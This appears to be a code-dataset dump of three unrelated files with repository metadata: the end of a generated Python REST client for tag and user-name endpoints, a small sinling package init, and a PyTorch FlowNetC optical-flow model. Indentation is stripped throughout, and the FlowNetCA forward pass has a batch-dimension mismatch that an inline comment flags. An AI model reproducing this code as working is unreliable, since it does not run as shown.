timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseTagListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Get user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_user_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_name_view(self, **kwargs): # noqa: E501
"""Get user name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_name_view_with_http_info(**kwargs) # noqa: E501
def get_user_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get user name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_user_name_view(self, payload, **kwargs): # noqa: E501
"""Create new user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_user_name_view(payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param UserNameAdd payload: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.post_user_name_view_with_http_info(payload, **kwargs) # noqa: E501
def post_user_name_view_with_http_info(self, payload, **kwargs): # noqa: E501
"""Create new user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_user_name_view_with_http_info(payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param UserNameAdd payload: (required)
        :param _return_http_data_only: return the response data only,
                                       without status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payload'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method post_user_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'payload' is set
if ('payload' not in local_var_params or
local_var_params['payload'] is None):
raise ApiValueError("Missing the required parameter `payload` when calling `post_user_name_view`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'payload' in local_var_params:
body_params = local_var_params['payload']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def put_user_name_update_view(self, uuid, payload, **kwargs): # noqa: E501
"""Update user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_name_update_view(uuid, payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param UserNameUpdate payload: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.put_user_name_update_view_with_http_info(uuid, payload, **kwargs) # noqa: E501
def put_user_name_update_view_with_http_info(self, uuid, payload, **kwargs): # noqa: E501
"""Update user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_name_update_view_with_http_info(uuid, payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param UserNameUpdate payload: (required)
        :param _return_http_data_only: return the response data only,
                                       without status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid', 'payload'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method put_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `put_user_name_update_view`") # noqa: E501
# verify the required parameter 'payload' is set
if ('payload' not in local_var_params or
local_var_params['payload'] is None):
raise ApiValueError("Missing the required parameter `payload` when calling `put_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'payload' in local_var_params:
body_params = local_var_params['payload']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
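# --- Illustrative usage sketch (not part of the generated client) ---
# Assumes `api` is an instance of the API class above, constructed around a
# configured ApiClient; the variable names are hypothetical.
#
#   names = api.get_user_name_view(limit=10, page=1, sort="name", order="asc")
#   thread = api.get_user_name_view(async_req=True)   # returns a worker thread
#   names = thread.get()                              # blocks until completion
#
#   created = api.post_user_name_view(payload)        # payload: UserNameAdd
#   updated = api.put_user_name_update_view(uuid, payload)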
| [per-file quality-signal columns]
| hexsha: f8ae575619677af7c3ad6715725d756406b87f3e | size: 140 | ext: py | lang: Python
| repo: ysenarath/sinling @ 34b4e3cecc8026f21d2845653ddb935c7705fea4 | path: sinling/core/__init__.py | licenses: ["Apache-2.0"]
| stars: 31 (2019-06-19T09:26:28.000Z – 2022-01-04T02:08:59.000Z) | issues: 6 (2020-04-18T07:15:53.000Z – 2021-02-09T01:41:22.000Z) | forks: 13 (2019-11-06T03:10:05.000Z – 2021-12-06T02:19:51.000Z)
| content:
from sinling.core.joiner import *
from sinling.core.stemmer import *
from sinling.core.tokenizer import *
from sinling.core.tagger import *
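# --- Note (illustrative) ---
# A star-importing package __init__ like the one above re-exports every public
# name from its submodules; each submodule can narrow what it exposes with an
# explicit __all__. A hypothetical sketch of one such submodule:
#
#   # sinling/core/tokenizer.py (hypothetical contents, not the actual code)
#   __all__ = ["Tokenizer"]
#
#   class Tokenizer:
#       def tokenize(self, text):
#           return text.split()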
| [per-file quality-signal columns]
| hexsha: f8c6d1db23e04b76c93897503b2c1f149539aa43 | size: 15,722 | ext: py | lang: Python
| repo: naivete5656/BFP @ 74c5604a9ba4eaa3ec3e2c76ef5e1282d7d10f18 | path: networks/flownetc.py | licenses: ["MIT"]
| stars: 8 (2020-07-31T15:20:01.000Z – 2021-09-18T08:42:07.000Z) | issues: null | forks: 5 (2020-10-04T02:02:13.000Z – 2021-11-14T23:37:08.000Z)
| content:
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn.init import kaiming_normal_, constant_
import math
import numpy as np
from .util import conv, predict_flow, deconv, crop_like, correlate
"Parameter count , 39,175,298 "
class FlowNetC(nn.Module):
expansion = 1
def __init__(self, batchNorm=True):
super(FlowNetC, self).__init__()
self.batchNorm = batchNorm
self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
self.conv3_1 = conv(self.batchNorm, 473, 256)
self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
self.conv4_1 = conv(self.batchNorm, 512, 512)
self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
self.conv5_1 = conv(self.batchNorm, 512, 512)
self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
self.conv6_1 = conv(self.batchNorm, 1024, 1024)
self.deconv5 = deconv(1024, 512)
self.deconv4 = deconv(1026, 256)
self.deconv3 = deconv(770, 128)
self.deconv2 = deconv(386, 64)
self.predict_flow6 = predict_flow(1024)
self.predict_flow5 = predict_flow(1026)
self.predict_flow4 = predict_flow(770)
self.predict_flow3 = predict_flow(386)
self.predict_flow2 = predict_flow(194)
self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
kaiming_normal_(m.weight, 0.1)
if m.bias is not None:
constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
constant_(m.weight, 1)
constant_(m.bias, 0)
def forward(self, x):
x1 = x[:, :1]
x2 = x[:, 1:]
out_conv1a = self.conv1(x1)
out_conv2a = self.conv2(out_conv1a)
out_conv3a = self.conv3(out_conv2a)
out_conv1b = self.conv1(x2)
out_conv2b = self.conv2(out_conv1b)
out_conv3b = self.conv3(out_conv2b)
out_conv_redir = self.conv_redir(out_conv3a)
out_correlation = correlate(out_conv3a, out_conv3b)
in_conv3_1 = torch.cat([out_conv_redir, out_correlation], dim=1)
out_conv3 = self.conv3_1(in_conv3_1)
out_conv4 = self.conv4_1(self.conv4(out_conv3))
out_conv5 = self.conv5_1(self.conv5(out_conv4))
out_conv6 = self.conv6_1(self.conv6(out_conv5))
flow6 = self.predict_flow6(out_conv6)
flow6_up = crop_like(self.upsampled_flow6_to_5(flow6), out_conv5)
out_deconv5 = crop_like(self.deconv5(out_conv6), out_conv5)
concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
flow5 = self.predict_flow5(concat5)
flow5_up = crop_like(self.upsampled_flow5_to_4(flow5), out_conv4)
out_deconv4 = crop_like(self.deconv4(concat5), out_conv4)
concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
flow4 = self.predict_flow4(concat4)
flow4_up = crop_like(self.upsampled_flow4_to_3(flow4), out_conv3)
out_deconv3 = crop_like(self.deconv3(concat4), out_conv3)
concat3 = torch.cat((out_conv3, out_deconv3, flow4_up), 1)
flow3 = self.predict_flow3(concat3)
flow3_up = crop_like(self.upsampled_flow3_to_2(flow3), out_conv2a)
out_deconv2 = crop_like(self.deconv2(concat3), out_conv2a)
concat2 = torch.cat((out_conv2a, out_deconv2, flow3_up), 1)
flow2 = self.predict_flow2(concat2)
        # Training and eval mode return the same multi-scale tuple, so the
        # original `if self.training:` branch (whose arms were identical)
        # collapses to a single return.
        return flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6
def weight_parameters(self):
return [param for name, param in self.named_parameters() if "weight" in name]
def bias_parameters(self):
return [param for name, param in self.named_parameters() if "bias" in name]
class FlowNetC2(nn.Module):
def __init__(self):
super().__init__()
self.flownetc = FlowNetC()
self.upsampled_flow2_to_1 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.upsampled_flow1_to_0 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.predict_flow1 = predict_flow(130)
self.predict_flow = predict_flow(66)
self.deconv1 = deconv(194, 64)
self.deconv = deconv(130, 64)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6 = self.flownetc(x)
flow2_up = self.upsampled_flow2_to_1(flow2)
out_deconv1 = self.deconv1(concat2)
concat1 = torch.cat((out_conv1a, out_deconv1, flow2_up), 1)
flow1 = self.predict_flow1(concat1)
flow_up = self.upsampled_flow1_to_0(flow1)
out_deconv = self.deconv(concat1)
concat0 = torch.cat((out_deconv, flow_up), 1)
flow = self.predict_flow(concat0)
# flow = self.sigmoid(flow)
return flow, flow1, flow2, flow3, flow4, flow5, flow6
class FlowNetCA(nn.Module):
expansion = 1
def __init__(self, batchNorm=True):
super().__init__()
self.batchNorm = batchNorm
self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
self.conv3_1 = conv(self.batchNorm, 473, 256)
self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
self.conv4_1 = conv(self.batchNorm, 512, 512)
self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
self.conv5_1 = conv(self.batchNorm, 512, 512)
self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
self.conv6_1 = conv(self.batchNorm, 1024, 1024)
self.deconv5 = deconv(1024, 512)
self.deconv4 = deconv(1026, 256)
self.deconv3 = deconv(770, 128)
self.deconv2 = deconv(386, 64)
self.predict_flow6 = predict_flow(1024)
self.predict_flow5 = predict_flow(1026)
self.predict_flow4 = predict_flow(770)
self.predict_flow3 = predict_flow(386)
self.predict_flow2 = predict_flow(194)
self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow2_to_1 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.upsampled_flow1_to_0 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.predict_flow1 = predict_flow(130)
self.predict_flow = predict_flow(66)
self.deconv1 = deconv(194, 64)
self.deconv = deconv(130, 64)
self.sigmoid = nn.Sigmoid()
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
kaiming_normal_(m.weight, 0.1)
if m.bias is not None:
constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
constant_(m.weight, 1)
constant_(m.bias, 0)
def forward(self, x):
x1 = x[:, :1]
x2 = x[:, 1:]
out_conv1a = self.conv1(x1)
out_conv2a = self.conv2(out_conv1a)
out_conv3a = self.conv3(out_conv2a)
out_conv1b = self.conv1(x2)
out_conv2b = self.conv2(out_conv1b)
out_conv3b = self.conv3(out_conv2b)
        # torch.cat defaults to dim=0, so the two siamese streams are stacked
        # along the batch axis (made explicit below). Beware: this doubles the
        # batch size of out_conv1/out_conv2 relative to the decoder tensors
        # they are concatenated with along dim=1 further down.
        out_conv1 = torch.cat([out_conv1a, out_conv1b], dim=0)
        out_conv2 = torch.cat([out_conv2a, out_conv2b], dim=0)
        out_conv3 = torch.cat([out_conv3a, out_conv3b], dim=0)
out_conv_redir = self.conv_redir(out_conv3a)
out_correlation = correlate(out_conv3a, out_conv3b)
in_conv3_1 = torch.cat([out_conv_redir, out_correlation], dim=1)
out_conv3 = self.conv3_1(in_conv3_1)
out_conv4 = self.conv4_1(self.conv4(out_conv3))
out_conv5 = self.conv5_1(self.conv5(out_conv4))
out_conv6 = self.conv6_1(self.conv6(out_conv5))
flow6 = self.predict_flow6(out_conv6)
flow6_up = crop_like(self.upsampled_flow6_to_5(flow6), out_conv5)
out_deconv5 = crop_like(self.deconv5(out_conv6), out_conv5)
concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
flow5 = self.predict_flow5(concat5)
flow5_up = crop_like(self.upsampled_flow5_to_4(flow5), out_conv4)
out_deconv4 = crop_like(self.deconv4(concat5), out_conv4)
concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
flow4 = self.predict_flow4(concat4)
flow4_up = crop_like(self.upsampled_flow4_to_3(flow4), out_conv3)
out_deconv3 = crop_like(self.deconv3(concat4), out_conv3)
concat3 = torch.cat((out_conv3, out_deconv3, flow4_up), 1)
flow3 = self.predict_flow3(concat3)
flow3_up = crop_like(self.upsampled_flow3_to_2(flow3), out_conv2a)
out_deconv2 = crop_like(self.deconv2(concat3), out_conv2)
concat2 = torch.cat((out_conv2, out_deconv2, flow3_up), 1)
flow2 = self.predict_flow2(concat2)
flow2_up = self.upsampled_flow2_to_1(flow2)
out_deconv1 = crop_like(self.deconv1(concat2), out_conv1)
concat1 = torch.cat((out_conv1, out_deconv1, flow2_up), 1)
flow1 = self.predict_flow1(concat1)
flow_up = self.upsampled_flow1_to_0(flow1)
out_deconv = self.deconv(concat1)
concat0 = torch.cat((out_deconv, flow_up), 1)
flow = self.predict_flow(concat0)
return flow, flow1, flow2, flow3, flow4, flow5, flow6
def weight_parameters(self):
return [param for name, param in self.named_parameters() if "weight" in name]
def bias_parameters(self):
return [param for name, param in self.named_parameters() if "bias" in name]
if __name__ == "__main__":
    # Smoke test. FlowNetC2() takes no constructor arguments, so the argparse
    # namespace the original script passed in (only used by the commented-out
    # fp16 variant below) is dropped here.
    model = FlowNetC2()
    x = torch.randn(10, 2, 256, 256)  # batch of 10 two-frame grayscale pairs
    pred = model(x)
# class FlowNetC(nn.Module):
# def __init__(self, args, batchNorm=True, div_flow=20):
# super(FlowNetC, self).__init__()
# self.batchNorm = batchNorm
# self.div_flow = div_flow
# self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
# self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
# self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
# self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
# if args.fp16:
# self.corr = nn.Sequential(
# tofp32(),
# Correlation(
# pad_size=20,
# kernel_size=1,
# max_displacement=20,
# stride1=1,
# stride2=2,
# corr_multiply=1,
# ),
# tofp16(),
# )
# else:
# self.corr = Correlation(
# pad_size=20,
# kernel_size=1,
# max_displacement=20,
# stride1=1,
# stride2=2,
# corr_multiply=1,
# )
# # self.corr_activation = nn.LeakyReLU(0.1, inplace=True)
# self.corr_activation = nn.ReLU(inplace=True)
# self.conv3_1 = conv(self.batchNorm, 473, 256)
# self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
# self.conv4_1 = conv(self.batchNorm, 512, 512)
# self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
# self.conv5_1 = conv(self.batchNorm, 512, 512)
# self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
# self.conv6_1 = conv(self.batchNorm, 1024, 1024)
# self.deconv5 = deconv(1024, 512)
# self.deconv4 = deconv(1026, 256)
# self.deconv3 = deconv(770, 128)
# self.deconv2 = deconv(386, 64)
# self.predict_flow6 = predict_flow(1024)
# self.predict_flow5 = predict_flow(1026)
# self.predict_flow4 = predict_flow(770)
# self.predict_flow3 = predict_flow(386)
# self.predict_flow2 = predict_flow(194)
# self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# if m.bias is not None:
# init.uniform_(m.bias)
# init.xavier_uniform_(m.weight)
# if isinstance(m, nn.ConvTranspose2d):
# if m.bias is not None:
# init.uniform_(m.bias)
# init.xavier_uniform_(m.weight)
# # init_deconv_bilinear(m.weight)
# self.upsample1 = nn.Upsample(scale_factor=4, mode="bilinear")
# def forward(self, x):
# x1 = x[:, 0:1, :, :]
# x2 = x[:, 1::, :, :]
# out_conv1a = self.conv1(x1)
# out_conv2a = self.conv2(out_conv1a)
# out_conv3a = self.conv3(out_conv2a)
# # FlownetC bottom input stream
# out_conv1b = self.conv1(x2)
# out_conv2b = self.conv2(out_conv1b)
# out_conv3b = self.conv3(out_conv2b)
# # Merge streams
# out_corr = self.corr(out_conv3a, out_conv3b) # False
# out_corr = self.corr_activation(out_corr)
# # Redirect top input stream and concatenate
# out_conv_redir = self.conv_redir(out_conv3a)
# in_conv3_1 = torch.cat((out_conv_redir, out_corr), 1)
# # Merged conv layers
# out_conv3_1 = self.conv3_1(in_conv3_1)
# out_conv4 = self.conv4_1(self.conv4(out_conv3_1))
# out_conv5 = self.conv5_1(self.conv5(out_conv4))
# out_conv6 = self.conv6_1(self.conv6(out_conv5))
# flow6 = self.predict_flow6(out_conv6)
# flow6_up = self.upsampled_flow6_to_5(flow6)
# out_deconv5 = self.deconv5(out_conv6)
# concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
# flow5 = self.predict_flow5(concat5)
# flow5_up = self.upsampled_flow5_to_4(flow5)
# out_deconv4 = self.deconv4(concat5)
# concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
# flow4 = self.predict_flow4(concat4)
# flow4_up = self.upsampled_flow4_to_3(flow4)
# out_deconv3 = self.deconv3(concat4)
# concat3 = torch.cat((out_conv3_1, out_deconv3, flow4_up), 1)
# flow3 = self.predict_flow3(concat3)
# flow3_up = self.upsampled_flow3_to_2(flow3)
# out_deconv2 = self.deconv2(concat3)
# concat2 = torch.cat((out_conv2a, out_deconv2, flow3_up), 1)
# flow2 = self.predict_flow2(concat2)
# return flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6
